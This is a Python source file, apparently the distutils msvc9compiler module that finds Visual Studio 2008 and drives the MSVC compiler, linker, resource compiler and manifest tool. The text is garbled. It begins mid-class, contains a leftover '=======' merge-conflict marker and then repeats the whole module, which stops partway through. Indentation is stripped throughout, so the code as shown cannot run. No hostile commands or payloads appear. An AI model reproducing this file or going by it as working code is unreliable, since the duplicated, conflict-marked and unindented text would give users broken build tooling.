if "DISTUTILS_USE_SDK" in os.environ and "MSSdk" in os.environ and self.find_exe("cl.exe"):
# Assume that the SDK set up everything alright; don't try to be
# smarter
self.cc = "cl.exe"
self.linker = "link.exe"
self.lib = "lib.exe"
self.rc = "rc.exe"
self.mc = "mc.exe"
else:
# On x86, 'vcvars32.bat amd64' creates an env that doesn't work;
# to cross compile, you use 'x86_amd64'.
# On AMD64, 'vcvars32.bat amd64' is a native build env; to cross
# compile use 'x86' (ie, it runs the x86 compiler directly)
# No idea how itanium handles this, if at all.
if plat_name == get_platform() or plat_name == 'win32':
# native build or cross-compile to win32
plat_spec = PLAT_TO_VCVARS[plat_name]
else:
# cross compile from win32 -> some 64bit
plat_spec = PLAT_TO_VCVARS[get_platform()] + '_' + \
PLAT_TO_VCVARS[plat_name]
vc_env = query_vcvarsall(VERSION, plat_spec)
self.__paths = vc_env['path'].split(os.pathsep)
os.environ['lib'] = vc_env['lib']
os.environ['include'] = vc_env['include']
if len(self.__paths) == 0:
raise DistutilsPlatformError("Python was built with %s, "
"and extensions need to be built with the same "
"version of the compiler, but it isn't installed."
% self.__product)
self.cc = self.find_exe("cl.exe")
self.linker = self.find_exe("link.exe")
self.lib = self.find_exe("lib.exe")
self.rc = self.find_exe("rc.exe") # resource compiler
self.mc = self.find_exe("mc.exe") # message compiler
#self.set_path_env_var('lib')
#self.set_path_env_var('include')
# extend the MSVC path with the current path
try:
for p in os.environ['path'].split(';'):
self.__paths.append(p)
except KeyError:
pass
self.__paths = normalize_and_reduce_paths(self.__paths)
os.environ['path'] = ";".join(self.__paths)
self.preprocess_options = None
if self.__arch == "x86":
self.compile_options = [ '/nologo', '/Ox', '/MD', '/W3',
'/DNDEBUG']
self.compile_options_debug = ['/nologo', '/Od', '/MDd', '/W3',
'/Z7', '/D_DEBUG']
else:
# Win64
self.compile_options = [ '/nologo', '/Ox', '/MD', '/W3', '/GS-' ,
'/DNDEBUG']
self.compile_options_debug = ['/nologo', '/Od', '/MDd', '/W3', '/GS-',
'/Z7', '/D_DEBUG']
self.ldflags_shared = ['/DLL', '/nologo', '/INCREMENTAL:NO']
if self.__version >= 7:
self.ldflags_shared_debug = [
'/DLL', '/nologo', '/INCREMENTAL:no', '/DEBUG', '/pdb:None'
]
self.ldflags_static = [ '/nologo']
self.initialized = True
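    # Illustrative plat_spec values that initialize() passes to vcvarsall.bat
    # (derived from PLAT_TO_VCVARS above; cross builds join host and target
    # with an underscore):
    #   native win32 build                -> 'x86'
    #   native win-amd64 build            -> 'amd64'
    #   cross compile win32 -> win-amd64  -> 'x86_amd64'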
# -- Worker methods ------------------------------------------------
def object_filenames(self,
source_filenames,
strip_dir=0,
output_dir=''):
# Copied from ccompiler.py, extended to return .res as 'object'-file
# for .rc input file
if output_dir is None: output_dir = ''
obj_names = []
for src_name in source_filenames:
(base, ext) = os.path.splitext (src_name)
base = os.path.splitdrive(base)[1] # Chop off the drive
base = base[os.path.isabs(base):] # If abs, chop off leading /
if ext not in self.src_extensions:
# Better to raise an exception instead of silently continuing
# and later complain about sources and targets having
# different lengths
raise CompileError ("Don't know how to compile %s" % src_name)
if strip_dir:
base = os.path.basename (base)
if ext in self._rc_extensions:
obj_names.append (os.path.join (output_dir,
base + self.res_extension))
elif ext in self._mc_extensions:
obj_names.append (os.path.join (output_dir,
base + self.res_extension))
else:
obj_names.append (os.path.join (output_dir,
base + self.obj_extension))
return obj_names
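    # For example (illustrative, not executed): with output_dir='build',
    # sources ['foo.c', 'bar.rc', 'msg.mc'] map to
    # ['build\\foo.obj', 'build\\bar.res', 'build\\msg.res'].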
def compile(self, sources,
output_dir=None, macros=None, include_dirs=None, debug=0,
extra_preargs=None, extra_postargs=None, depends=None):
if not self.initialized:
self.initialize()
compile_info = self._setup_compile(output_dir, macros, include_dirs,
sources, depends, extra_postargs)
macros, objects, extra_postargs, pp_opts, build = compile_info
compile_opts = extra_preargs or []
compile_opts.append ('/c')
if debug:
compile_opts.extend(self.compile_options_debug)
else:
compile_opts.extend(self.compile_options)
for obj in objects:
try:
src, ext = build[obj]
except KeyError:
continue
if debug:
# pass the full pathname to MSVC in debug mode,
# this allows the debugger to find the source file
# without asking the user to browse for it
src = os.path.abspath(src)
if ext in self._c_extensions:
input_opt = "/Tc" + src
elif ext in self._cpp_extensions:
input_opt = "/Tp" + src
elif ext in self._rc_extensions:
# compile .RC to .RES file
input_opt = src
output_opt = "/fo" + obj
try:
self.spawn([self.rc] + pp_opts +
[output_opt] + [input_opt])
except DistutilsExecError as msg:
raise CompileError(msg)
continue
elif ext in self._mc_extensions:
# Compile .MC to .RC file to .RES file.
# * '-h dir' specifies the directory for the
# generated include file
# * '-r dir' specifies the target directory of the
# generated RC file and the binary message resource
# it includes
#
# For now (since there are no options to change this),
# we use the source-directory for the include file and
# the build directory for the RC file and message
# resources. This works at least for win32all.
h_dir = os.path.dirname(src)
rc_dir = os.path.dirname(obj)
try:
# first compile .MC to .RC and .H file
self.spawn([self.mc] +
['-h', h_dir, '-r', rc_dir] + [src])
base, _ = os.path.splitext (os.path.basename (src))
rc_file = os.path.join (rc_dir, base + '.rc')
# then compile .RC to .RES file
self.spawn([self.rc] +
["/fo" + obj] + [rc_file])
except DistutilsExecError as msg:
raise CompileError(msg)
continue
else:
# how to handle this file?
raise CompileError("Don't know how to compile %s to %s"
% (src, obj))
output_opt = "/Fo" + obj
try:
self.spawn([self.cc] + compile_opts + pp_opts +
[input_opt, output_opt] +
extra_postargs)
except DistutilsExecError as msg:
raise CompileError(msg)
return objects
def create_static_lib(self,
objects,
output_libname,
output_dir=None,
debug=0,
target_lang=None):
if not self.initialized:
self.initialize()
(objects, output_dir) = self._fix_object_args(objects, output_dir)
output_filename = self.library_filename(output_libname,
output_dir=output_dir)
if self._need_link(objects, output_filename):
lib_args = objects + ['/OUT:' + output_filename]
if debug:
pass # XXX what goes here?
try:
self.spawn([self.lib] + lib_args)
except DistutilsExecError as msg:
raise LibError(msg)
else:
log.debug("skipping %s (up-to-date)", output_filename)
def link(self,
target_desc,
objects,
output_filename,
output_dir=None,
libraries=None,
library_dirs=None,
runtime_library_dirs=None,
export_symbols=None,
debug=0,
extra_preargs=None,
extra_postargs=None,
build_temp=None,
target_lang=None):
if not self.initialized:
self.initialize()
(objects, output_dir) = self._fix_object_args(objects, output_dir)
fixed_args = self._fix_lib_args(libraries, library_dirs,
runtime_library_dirs)
(libraries, library_dirs, runtime_library_dirs) = fixed_args
if runtime_library_dirs:
self.warn ("I don't know what to do with 'runtime_library_dirs': "
+ str (runtime_library_dirs))
lib_opts = gen_lib_options(self,
library_dirs, runtime_library_dirs,
libraries)
if output_dir is not None:
output_filename = os.path.join(output_dir, output_filename)
if self._need_link(objects, output_filename):
if target_desc == CCompiler.EXECUTABLE:
if debug:
ldflags = self.ldflags_shared_debug[1:]
else:
ldflags = self.ldflags_shared[1:]
else:
if debug:
ldflags = self.ldflags_shared_debug
else:
ldflags = self.ldflags_shared
export_opts = []
for sym in (export_symbols or []):
export_opts.append("/EXPORT:" + sym)
ld_args = (ldflags + lib_opts + export_opts +
objects + ['/OUT:' + output_filename])
# The MSVC linker generates .lib and .exp files, which cannot be
# suppressed by any linker switches. The .lib files may even be
# needed! Make sure they are generated in the temporary build
# directory. Since they have different names for debug and release
# builds, they can go into the same directory.
build_temp = os.path.dirname(objects[0])
if export_symbols is not None:
(dll_name, dll_ext) = os.path.splitext(
os.path.basename(output_filename))
implib_file = os.path.join(
build_temp,
self.library_filename(dll_name))
ld_args.append ('/IMPLIB:' + implib_file)
self.manifest_setup_ldargs(output_filename, build_temp, ld_args)
if extra_preargs:
ld_args[:0] = extra_preargs
if extra_postargs:
ld_args.extend(extra_postargs)
self.mkpath(os.path.dirname(output_filename))
try:
self.spawn([self.linker] + ld_args)
except DistutilsExecError as msg:
raise LinkError(msg)
# embed the manifest
# XXX - this is somewhat fragile - if mt.exe fails, distutils
# will still consider the DLL up-to-date, but it will not have a
# manifest. Maybe we should link to a temp file? OTOH, that
# implies a build environment error that shouldn't go undetected.
mfinfo = self.manifest_get_embed_info(target_desc, ld_args)
if mfinfo is not None:
mffilename, mfid = mfinfo
out_arg = '-outputresource:%s;%s' % (output_filename, mfid)
try:
self.spawn(['mt.exe', '-nologo', '-manifest',
mffilename, out_arg])
except DistutilsExecError as msg:
raise LinkError(msg)
else:
log.debug("skipping %s (up-to-date)", output_filename)
def manifest_setup_ldargs(self, output_filename, build_temp, ld_args):
# If we need a manifest at all, an embedded manifest is recommended.
# See MSDN article titled
# "How to: Embed a Manifest Inside a C/C++ Application"
# (currently at http://msdn2.microsoft.com/en-us/library/ms235591(VS.80).aspx)
# Ask the linker to generate the manifest in the temp dir, so
# we can check it, and possibly embed it, later.
temp_manifest = os.path.join(
build_temp,
os.path.basename(output_filename) + ".manifest")
ld_args.append('/MANIFESTFILE:' + temp_manifest)
def manifest_get_embed_info(self, target_desc, ld_args):
# If a manifest should be embedded, return a tuple of
# (manifest_filename, resource_id). Returns None if no manifest
# should be embedded. See http://bugs.python.org/issue7833 for why
        # we want to avoid any manifest for extension modules if we can.
for arg in ld_args:
if arg.startswith("/MANIFESTFILE:"):
temp_manifest = arg.split(":", 1)[1]
break
else:
# no /MANIFESTFILE so nothing to do.
return None
if target_desc == CCompiler.EXECUTABLE:
# by default, executables always get the manifest with the
# CRT referenced.
mfid = 1
else:
# Extension modules try and avoid any manifest if possible.
mfid = 2
temp_manifest = self._remove_visual_c_ref(temp_manifest)
if temp_manifest is None:
return None
return temp_manifest, mfid
def _remove_visual_c_ref(self, manifest_file):
try:
# Remove references to the Visual C runtime, so they will
# fall through to the Visual C dependency of Python.exe.
# This way, when installed for a restricted user (e.g.
# runtimes are not in WinSxS folder, but in Python's own
# folder), the runtimes do not need to be in every folder
# with .pyd's.
# Returns either the filename of the modified manifest or
# None if no manifest should be embedded.
manifest_f = open(manifest_file)
try:
manifest_buf = manifest_f.read()
finally:
manifest_f.close()
pattern = re.compile(
r"""<assemblyIdentity.*?name=("|')Microsoft\."""\
r"""VC\d{2}\.CRT("|').*?(/>|</assemblyIdentity>)""",
re.DOTALL)
manifest_buf = re.sub(pattern, "", manifest_buf)
pattern = "<dependentAssembly>\s*</dependentAssembly>"
manifest_buf = re.sub(pattern, "", manifest_buf)
# Now see if any other assemblies are referenced - if not, we
# don't want a manifest embedded.
pattern = re.compile(
r"""<assemblyIdentity.*?name=(?:"|')(.+?)(?:"|')"""
r""".*?(?:/>|</assemblyIdentity>)""", re.DOTALL)
if re.search(pattern, manifest_buf) is None:
return None
manifest_f = open(manifest_file, 'w')
try:
manifest_f.write(manifest_buf)
return manifest_file
finally:
manifest_f.close()
except OSError:
pass
# -- Miscellaneous methods -----------------------------------------
    # These are all used by the gen_lib_options() function in
# ccompiler.py.
def library_dir_option(self, dir):
return "/LIBPATH:" + dir
def runtime_library_dir_option(self, dir):
raise DistutilsPlatformError(
"don't know how to set runtime library search path for MSVC++")
def library_option(self, lib):
return self.library_filename(lib)
def find_library_file(self, dirs, lib, debug=0):
# Prefer a debugging library if found (and requested), but deal
# with it if we don't have one.
if debug:
try_names = [lib + "_d", lib]
else:
try_names = [lib]
for dir in dirs:
for name in try_names:
libfile = os.path.join(dir, self.library_filename (name))
if os.path.exists(libfile):
return libfile
else:
# Oops, didn't find it in *any* of 'dirs'
return None
# Helper methods for using the MSVC registry settings
def find_exe(self, exe):
"""Return path to an MSVC executable program.
Tries to find the program in several places: first, one of the
MSVC program search paths from the registry; next, the directories
in the PATH environment variable. If any of those work, return an
absolute path that is known to exist. If none of them work, just
return the original program name, 'exe'.
"""
for p in self.__paths:
fn = os.path.join(os.path.abspath(p), exe)
if os.path.isfile(fn):
return fn
# didn't find it; try existing path
for p in os.environ['Path'].split(';'):
fn = os.path.join(os.path.abspath(p),exe)
if os.path.isfile(fn):
return fn
return exe
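# A minimal usage sketch (assumption: a Windows host with VS 2008 installed),
# mirroring what distutils' build_ext command does with this class; the
# source file name 'example.c' is hypothetical.
#
#     compiler = MSVCCompiler()
#     compiler.initialize(plat_name='win32')
#     objs = compiler.compile(['example.c'], output_dir='build')
#     compiler.link_shared_lib(objs, 'example', output_dir='build')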
=======
"""distutils.msvc9compiler
Contains MSVCCompiler, an implementation of the abstract CCompiler class
for the Microsoft Visual Studio 2008.
The module is compatible with VS 2005 and VS 2008. You can find legacy support
for older versions of VS in distutils.msvccompiler.
"""
import os
import subprocess
import sys
import re
from distutils.errors import DistutilsExecError, DistutilsPlatformError, \
CompileError, LibError, LinkError
from distutils.ccompiler import CCompiler, gen_preprocess_options, \
gen_lib_options
from distutils import log
from distutils.util import get_platform
import winreg
RegOpenKeyEx = winreg.OpenKeyEx
RegEnumKey = winreg.EnumKey
RegEnumValue = winreg.EnumValue
RegError = winreg.error
HKEYS = (winreg.HKEY_USERS,
winreg.HKEY_CURRENT_USER,
winreg.HKEY_LOCAL_MACHINE,
winreg.HKEY_CLASSES_ROOT)
NATIVE_WIN64 = (sys.platform == 'win32' and sys.maxsize > 2**32)
if NATIVE_WIN64:
# Visual C++ is a 32-bit application, so we need to look in
# the corresponding registry branch, if we're running a
# 64-bit Python on Win64
VS_BASE = r"Software\Wow6432Node\Microsoft\VisualStudio\%0.1f"
WINSDK_BASE = r"Software\Wow6432Node\Microsoft\Microsoft SDKs\Windows"
NET_BASE = r"Software\Wow6432Node\Microsoft\.NETFramework"
else:
VS_BASE = r"Software\Microsoft\VisualStudio\%0.1f"
WINSDK_BASE = r"Software\Microsoft\Microsoft SDKs\Windows"
NET_BASE = r"Software\Microsoft\.NETFramework"
PLAT_TO_VCVARS = {
'win32' : 'x86',
'win-amd64' : 'amd64',
'win-ia64' : 'ia64',
}
class Reg:
"""Helper class to read values from the registry
"""
def get_value(cls, path, key):
for base in HKEYS:
d = cls.read_values(base, path)
if d and key in d:
return d[key]
raise KeyError(key)
get_value = classmethod(get_value)
def read_keys(cls, base, key):
"""Return list of registry keys."""
try:
handle = RegOpenKeyEx(base, key)
except RegError:
return None
L = []
i = 0
while True:
try:
k = RegEnumKey(handle, i)
except RegError:
break
L.append(k)
i += 1
return L
read_keys = classmethod(read_keys)
def read_values(cls, base, key):
"""Return dict of registry keys and values.
All names are converted to lowercase.
"""
try:
handle = RegOpenKeyEx(base, key)
except RegError:
return None
d = {}
i = 0
while True:
try:
name, value, type = RegEnumValue(handle, i)
except RegError:
break
name = name.lower()
d[cls.convert_mbcs(name)] = cls.convert_mbcs(value)
i += 1
return d
read_values = classmethod(read_values)
def convert_mbcs(s):
dec = getattr(s, "decode", None)
if dec is not None:
try:
s = dec("mbcs")
except UnicodeError:
pass
return s
convert_mbcs = staticmethod(convert_mbcs)
class MacroExpander:
def __init__(self, version):
self.macros = {}
self.vsbase = VS_BASE % version
self.load_macros(version)
def set_macro(self, macro, path, key):
self.macros["$(%s)" % macro] = Reg.get_value(path, key)
def load_macros(self, version):
self.set_macro("VCInstallDir", self.vsbase + r"\Setup\VC", "productdir")
self.set_macro("VSInstallDir", self.vsbase + r"\Setup\VS", "productdir")
self.set_macro("FrameworkDir", NET_BASE, "installroot")
try:
if version >= 8.0:
self.set_macro("FrameworkSDKDir", NET_BASE,
"sdkinstallrootv2.0")
else:
raise KeyError("sdkinstallrootv2.0")
except KeyError:
raise DistutilsPlatformError(
"""Python was built with Visual Studio 2008;
extensions must be built with a compiler than can generate compatible binaries.
Visual Studio 2008 was not found on this system. If you have Cygwin installed,
you can try compiling with MingW32, by passing "-c mingw32" to setup.py.""")
if version >= 9.0:
self.set_macro("FrameworkVersion", self.vsbase, "clr version")
self.set_macro("WindowsSdkDir", WINSDK_BASE, "currentinstallfolder")
else:
p = r"Software\Microsoft\NET Framework Setup\Product"
for base in HKEYS:
try:
h = RegOpenKeyEx(base, p)
except RegError:
continue
key = RegEnumKey(h, 0)
d = Reg.get_value(base, r"%s\%s" % (p, key))
self.macros["$(FrameworkVersion)"] = d["version"]
def sub(self, s):
for k, v in self.macros.items():
s = s.replace(k, v)
return s
def get_build_version():
"""Return the version of MSVC that was used to build Python.
For Python 2.3 and up, the version number is included in
sys.version. For earlier versions, assume the compiler is MSVC 6.
"""
prefix = "MSC v."
i = sys.version.find(prefix)
if i == -1:
return 6
i = i + len(prefix)
s, rest = sys.version[i:].split(" ", 1)
majorVersion = int(s[:-2]) - 6
minorVersion = int(s[2:3]) / 10.0
# I don't think paths are affected by minor version in version 6
if majorVersion == 6:
minorVersion = 0
if majorVersion >= 6:
return majorVersion + minorVersion
# else we don't know what version of the compiler this is
return None
def normalize_and_reduce_paths(paths):
"""Return a list of normalized paths with duplicates removed.
The current order of paths is maintained.
"""
# Paths are normalized so things like: /a and /a/ aren't both preserved.
reduced_paths = []
for p in paths:
np = os.path.normpath(p)
# XXX(nnorwitz): O(n**2), if reduced_paths gets long perhaps use a set.
if np not in reduced_paths:
reduced_paths.append(np)
return reduced_paths
def removeDuplicates(variable):
"""Remove duplicate values of an environment variable.
"""
oldList = variable.split(os.pathsep)
newList = []
for i in oldList:
if i not in newList:
newList.append(i)
newVariable = os.pathsep.join(newList)
return newVariable
def find_vcvarsall(version):
"""Find the vcvarsall.bat file
At first it tries to find the productdir of VS 2008 in the registry. If
that fails it falls back to the VS90COMNTOOLS env var.
"""
vsbase = VS_BASE % version
try:
productdir = Reg.get_value(r"%s\Setup\VC" % vsbase,
"productdir")
except KeyError:
log.debug("Unable to find productdir in registry")
productdir = None
if not productdir or not os.path.isdir(productdir):
toolskey = "VS%0.f0COMNTOOLS" % version
toolsdir = os.environ.get(toolskey, None)
if toolsdir and os.path.isdir(toolsdir):
productdir = os.path.join(toolsdir, os.pardir, os.pardir, "VC")
productdir = os.path.abspath(productdir)
if not os.path.isdir(productdir):
log.debug("%s is not a valid directory" % productdir)
return None
else:
log.debug("Env var %s is not set or invalid" % toolskey)
if not productdir:
log.debug("No productdir found")
return None
vcvarsall = os.path.join(productdir, "vcvarsall.bat")
if os.path.isfile(vcvarsall):
return vcvarsall
log.debug("Unable to find vcvarsall.bat")
return None
def query_vcvarsall(version, arch="x86"):
"""Launch vcvarsall.bat and read the settings from its environment
"""
vcvarsall = find_vcvarsall(version)
interesting = set(("include", "lib", "libpath", "path"))
result = {}
if vcvarsall is None:
raise DistutilsPlatformError("Unable to find vcvarsall.bat")
log.debug("Calling 'vcvarsall.bat %s' (version=%s)", arch, version)
popen = subprocess.Popen('"%s" %s & set' % (vcvarsall, arch),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
stdout, stderr = popen.communicate()
if popen.wait() != 0:
raise DistutilsPlatformError(stderr.decode("mbcs"))
stdout = stdout.decode("mbcs")
for line in stdout.split("\n"):
line = Reg.convert_mbcs(line)
if '=' not in line:
continue
line = line.strip()
key, value = line.split('=', 1)
key = key.lower()
if key in interesting:
if value.endswith(os.pathsep):
value = value[:-1]
result[key] = removeDuplicates(value)
finally:
popen.stdout.close()
popen.stderr.close()
if len(result) != len(interesting):
raise ValueError(str(list(result.keys())))
return result
VERSION = get_build_version()
if VERSION < 8.0:
raise DistutilsPlatformError("VC %0.1f is not supported by this module" % VERSION)
class MSVCCompiler(CCompiler) :
"""Concrete class that implements an interface to Microsoft Visual C++,
as defined by the CCompiler abstract class."""
compiler_type = 'msvc'
# Just set this so CCompiler's constructor doesn't barf. We currently
# don't use the 'set_executables()' bureaucracy provided by CCompiler,
# as it really isn't necessary for this sort of single-compiler class.
# Would be nice to have a consistent interface with UnixCCompiler,
# though, so it's worth thinking about.
executables = {}
# Private class data (need to distinguish C from C++ source for compiler)
_c_extensions = ['.c']
_cpp_extensions = ['.cc', '.cpp', '.cxx']
_rc_extensions = ['.rc']
_mc_extensions = ['.mc']
# Needed for the filename generation methods provided by the
# base class, CCompiler.
src_extensions = (_c_extensions + _cpp_extensions +
_rc_extensions + _mc_extensions)
res_extension = '.res'
obj_extension = '.obj'
static_lib_extension = '.lib'
shared_lib_extension = '.dll'
static_lib_format = shared_lib_format = '%s%s'
exe_extension = '.exe'
def __init__(self, verbose=0, dry_run=0, force=0):
CCompiler.__init__ (self, verbose, dry_run, force)
self.__version = VERSION
self.__root = r"Software\Microsoft\VisualStudio"
# self.__macros = MACROS
self.__paths = []
# target platform (.plat_name is consistent with 'bdist')
self.plat_name = None
self.__arch = None # deprecated name
self.initialized = False
def initialize(self, plat_name=None):
# multi-init means we would need to check platform same each time...
assert not self.initialized, "don't init multiple times"
if plat_name is None:
plat_name = get_platform()
# sanity check for platforms to prevent obscure errors later.
ok_plats = 'win32', 'win-amd64', 'win-ia64'
if plat_name not in ok_plats:
raise DistutilsPlatformError("--plat-name must be one of %s" %
(ok_plats,))
if "DISTUTILS_USE_SDK" in os.environ and "MSSdk" in os.environ and self.find_exe("cl.exe"):
# Assume that the SDK set up everything alright; don't try to be
# smarter
self.cc = "cl.exe"
self.linker = "link.exe"
self.lib = "lib.exe"
self.rc = "rc.exe"
self.mc = "mc.exe"
else:
# On x86, 'vcvars32.bat amd64' creates an env that doesn't work;
# to cross compile, you use 'x86_amd64'.
# On AMD64, 'vcvars32.bat amd64' is a native build env; to cross
# compile use 'x86' (ie, it runs the x86 compiler directly)
# No idea how itanium handles this, if at all.
if plat_name == get_platform() or plat_name == 'win32':
# native build or cross-compile to win32
plat_spec = PLAT_TO_VCVARS[plat_name]
else:
# cross compile from win32 -> some 64bit
plat_spec = PLAT_TO_VCVARS[get_platform()] + '_' + \
PLAT_TO_VCVARS[plat_name]
vc_env = query_vcvarsall(VERSION, plat_spec)
self.__paths = vc_env['path'].split(os.pathsep)
os.environ['lib'] = vc_env['lib']
os.environ['include'] = vc_env['include']
if len(self.__paths) == 0:
raise DistutilsPlatformError("Python was built with %s, "
"and extensions need to be built with the same "
"version of the compiler, but it isn't installed."
% self.__product)
self.cc = self.find_exe("cl.exe")
self.linker = self.find_exe("link.exe")
self.lib = self.find_exe("lib.exe")
self.rc = self.find_exe("rc.exe") # resource compiler
self.mc = self.find_exe("mc.exe") # message compiler
#self.set_path_env_var('lib')
#self.set_path_env_var('include')
# extend the MSVC path with the current path
try:
for p in os.environ['path'].split(';'):
self.__paths.append(p)
except KeyError:
pass
self.__paths = normalize_and_reduce_paths(self.__paths)
os.environ['path'] = ";".join(self.__paths)
self.preprocess_options = None
if self.__arch == "x86":
self.compile_options = [ '/nologo', '/Ox', '/MD', '/W3',
'/DNDEBUG']
self.compile_options_debug = ['/nologo', '/Od', '/MDd', '/W3',
'/Z7', '/D_DEBUG']
else:
# Win64
self.compile_options = [ '/nologo', '/Ox', '/MD', '/W3', '/GS-' ,
'/DNDEBUG']
self.compile_options_debug = ['/nologo', '/Od', '/MDd', '/W3', '/GS-',
'/Z7', '/D_DEBUG']
self.ldflags_shared = ['/DLL', '/nologo', '/INCREMENTAL:NO']
if self.__version >= 7:
self.ldflags_shared_debug = [
'/DLL', '/nologo', '/INCREMENTAL:no', '/DEBUG', '/pdb:None'
]
self.ldflags_static = [ '/nologo']
self.initialized = True
# -- Worker methods ------------------------------------------------
def object_filenames(self,
source_filenames,
strip_dir=0,
output_dir=''):
# Copied from ccompiler.py, extended to return .res as 'object'-file
# for .rc input file
if output_dir is None: output_dir = ''
obj_names = []
for src_name in source_filenames:
(base, ext) = os.path.splitext (src_name)
base = os.path.splitdrive(base)[1] # Chop off the drive
base = base[os.path.isabs(base):] # If abs, chop off leading /
if ext not in self.src_extensions:
# Better to raise an exception instead of silently continuing
# and later complain about sources and targets having
# different lengths
raise CompileError ("Don't know how to compile %s" % src_name)
if strip_dir:
base = os.path.basename (base)
if ext in self._rc_extensions:
obj_names.append (os.path.join (output_dir,
base + self.res_extension))
elif ext in self._mc_extensions:
obj_names.append (os.path.join (output_dir,
base + self.res_extension))
else:
obj_names.append (os.path.join (output_dir,
base + self.obj_extension))
return obj_names
def compile(self, sources,
output_dir=None, macros=None, include_dirs=None, debug=0,
extra_preargs=None, extra_postargs=None, depends=None):
if not self.initialized:
self.initialize()
compile_info = self._setup_compile(output_dir, macros, include_dirs,
sources, depends, extra_postargs)
macros, objects, extra_postargs, pp_opts, build = compile_info
compile_opts = extra_preargs or []
compile_opts.append ('/c')
if debug:
compile_opts.extend(self.compile_options_debug)
else:
compile_opts.extend(self.compile_options)
for obj in objects:
try:
src, ext = build[obj]
except KeyError:
continue
if debug:
# pass the full pathname to MSVC in debug mode,
# this allows the debugger to find the source file
# without asking the user to browse for it
src = os.path.abspath(src)
if ext in self._c_extensions:
input_opt = "/Tc" + src
elif ext in self._cpp_extensions:
input_opt = "/Tp" + src
elif ext in self._rc_extensions:
# compile .RC to .RES file
input_opt = src
output_opt = "/fo" + obj
try:
self.spawn([self.rc] + pp_opts +
[output_opt] + [input_opt])
except DistutilsExecError as msg:
raise CompileError(msg)
continue
elif ext in self._mc_extensions:
# Compile .MC to .RC file to .RES file.
# * '-h dir' specifies the directory for the
# generated include file
# * '-r dir' specifies the target directory of the
# generated RC file and the binary message resource
# it includes
#
# For now (since there are no options to change this),
# we use the source-directory for the include file and
# the build directory for the RC file and message
# resources. This works at least for win32all.
h_dir = os.path.dirname(src)
rc_dir = os.path.dirname(obj)
try:
# first compile .MC to .RC and .H file
self.spawn([self.mc] +
['-h', h_dir, '-r', rc_dir] + [src])
base, _ = os.path.splitext (os.path.basename (src))
rc_file = os.path.join (rc_dir, base + '.rc')
# then compile .RC to .RES file
self.spawn([self.rc] +
["/fo" + obj] + [rc_file])
except DistutilsExecError as msg:
raise CompileError(msg)
continue
else:
# how to handle this file?
raise CompileError("Don't know how to compile %s to %s"
% (src, obj))
output_opt = "/Fo" + obj
try:
self.spawn([self.cc] + compile_opts + pp_opts +
[input_opt, output_opt] +
extra_postargs)
except DistutilsExecError as msg:
raise CompileError(msg)
return objects
def create_static_lib(self,
objects,
output_libname,
output_dir=None,
debug=0,
target_lang=None):
if not self.initialized:
self.initialize()
(objects, output_dir) = self._fix_object_args(objects, output_dir)
output_filename = self.library_filename(output_libname,
output_dir=output_dir)
if self._need_link(objects, output_filename):
lib_args = objects + ['/OUT:' + output_filename]
if debug:
pass # XXX what goes here?
try:
self.spawn([self.lib] + lib_args)
except DistutilsExecError as msg:
raise LibError(msg)
else:
log.debug("skipping %s (up-to-date)", output_filename)
def link(self,
target_desc,
objects,
output_filename,
output_dir=None,
libraries=None,
library_dirs=None,
runtime_library_dirs=None,
export_symbols=None,
debug=0,
extra_preargs=None,
extra_postargs=None,
build_temp=None,
target_lang=None):
if not self.initialized:
self.initialize()
(objects, output_dir) = self._fix_object_args(objects, output_dir)
fixed_args = self._fix_lib_args(libraries, library_dirs,
runtime_library_dirs)
(libraries, library_dirs, runtime_library_dirs) = fixed_args
if runtime_library_dirs:
self.warn ("I don't know what to do with 'runtime_library_dirs': "
+ str (runtime_library_dirs))
lib_opts = gen_lib_options(self,
library_dirs, runtime_library_dirs,
libraries)
if output_dir is not None:
output_filename = os.path.join(output_dir, output_filename)
if self._need_link(objects, output_filename):
if target_desc == CCompiler.EXECUTABLE:
if debug:
ldflags = self.ldflags_shared_debug[1:]
else:
ldflags = self.ldflags_shared[1:]
else:
if debug:
ldflags = self.ldflags_shared_debug
else:
ldflags = self.ldflags_shared
export_opts = []
for sym in (export_symbols or []):
export_opts.append("/EXPORT:" + sym)
ld_args = (ldflags + lib_opts + export_opts +
objects + ['/OUT:' + output_filename])
# The MSVC linker generates .lib and .exp files, which cannot be
# suppressed by any linker switches. The .lib files may even be
# needed! Make sure they are generated in the temporary build
# directory. Since they have different names for debug and release
# builds, they can go into the same directory.
build_temp = os.path.dirname(objects[0])
if export_symbols is not None:
(dll_name, dll_ext) = os.path.splitext(
os.path.basename(output_filename))
implib_file = os.path.join(
build_temp,
self.library_filename(dll_name))
ld_args.append ('/IMPLIB:' + implib_file)
self.manifest_setup_ldargs(output_filename, build_temp, ld_args)
if extra_preargs:
ld_args[:0] = extra_preargs
if extra_postargs:
ld_args.extend(extra_postargs)
self.mkpath(os.path.dirname(output_filename))
try:
self.spawn([self.linker] + ld_args)
except DistutilsExecError as msg:
raise LinkError(msg)
# embed the manifest
# XXX - this is somewhat fragile - if mt.exe fails, distutils
# will still consider the DLL up-to-date, but it will not have a
# manifest. Maybe we should link to a temp file? OTOH, that
# implies a build environment error that shouldn't go undetected.
mfinfo = self.manifest_get_embed_info(target_desc, ld_args)
if mfinfo is not None:
mffilename, mfid = mfinfo
out_arg = '-outputresource:%s;%s' % (output_filename, mfid)
try:
self.spawn(['mt.exe', '-nologo', '-manifest',
mffilename, out_arg])
except DistutilsExecError as msg:
raise LinkError(msg)
else:
log.debug("skipping %s (up-to-date)", output_filename)
def manifest_setup_ldargs(self, output_filename, build_temp, ld_args):
# If we need a manifest at all, an embedded manifest is recommended.
# See MSDN article titled
# "How to: Embed a Manifest Inside a C/C++ Application"
# (currently at http://msdn2.microsoft.com/en-us/library/ms235591(VS.80).aspx)
# Ask the linker to generate the manifest in the temp dir, so
# we can check it, and possibly embed it, later.
temp_manifest = os.path.join(
build_temp,
os.path.basename(output_filename) + ".manifest")
ld_args.append('/MANIFESTFILE:' + temp_manifest)
def manifest_get_embed_info(self, target_desc, ld_args):
# If a manifest should be embedded, return a tuple of
# (manifest_filename, resource_id). Returns None if no manifest
# should be embedded. See http://bugs.python.org/issue7833 for why
# we want to avoid any manifest for extension modules if we can)
for arg in ld_args:
if arg.startswith("/MANIFESTFILE:"):
temp_manifest = arg.split(":", 1)[1]
break
else:
# no /MANIFESTFILE so nothing to do.
return None
if target_desc == CCompiler.EXECUTABLE:
# by default, executables always get the manifest with the
# CRT referenced.
mfid = 1
else:
# Extension modules try and avoid any manifest if possible.
mfid = 2
temp_manifest = self._remove_visual_c_ref(temp_manifest)
if temp_manifest is None:
return None
return temp_manifest, mfid
